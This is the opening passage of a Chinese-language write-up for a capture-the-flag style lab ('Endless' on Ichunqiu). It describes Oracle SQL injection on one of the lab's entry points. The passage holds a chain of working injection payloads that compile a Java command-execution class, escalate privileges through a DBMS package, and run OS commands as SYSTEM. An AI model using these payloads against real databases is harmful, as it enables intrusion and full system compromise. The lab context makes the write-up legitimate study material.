Ichunqiu云境 —— Endless(无间计划) Writeup
Author:小离-xiaoli
0x00 Intro
前言:
- 两个入口点,一个入口点是pboot-cms,另外一个是SQL注入
- 这边入口外网IP可能会有不一致得地方,因为靶场重启次数比较多,IP经常变化
- OSCP风格,不使用CS/MSF
- 这个靶场共有12个Flag
0x01 Recon
扫描结果:
-
入口点1 - SQL注入 (Linux):
-
入口点2 - Pboot-CMS (Linux):
0x02 入口点1 - SQL注入 (Linux)
前言:
- 一个站库分离的oracle注入,web是linux,注入点可以通过oracle注入发现到是一个windows,权限非dba,只有java runtime permission,这里没截图
- 这里前几次都没打成功,卡了挺久,后面搭建了个oracle和九世一起测试的
- 不建议用SqlMap,会把站打挂,并且可以看源码发现sqlmap提权函数没有定义关于oracle数据库的攻击方法
- Oracle 版本
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0
- 直接上payload
1. 创建JAVA Source
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual)>1 --
2.提权
admin' AND (SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual)>1--
3.创建函数
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual)>1--
4.查询创建的函数
admin' union select null,(select object_name from all_objects where object_name ='LINXRUNCMD' and rownum=1),null from dual--
5.查询java source
admin' union select null,(select object_name from all_objects where object_name ='LinxUtil'),null from dual--
6.命令执行
admin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--
-
函数LINXRUNCMD创建成功
-
whoami,直接是system权限了
-
ipconfig,该数据库内网IP为 172.23.4.51,此时需要回到入口点2进入内网了
## 0x0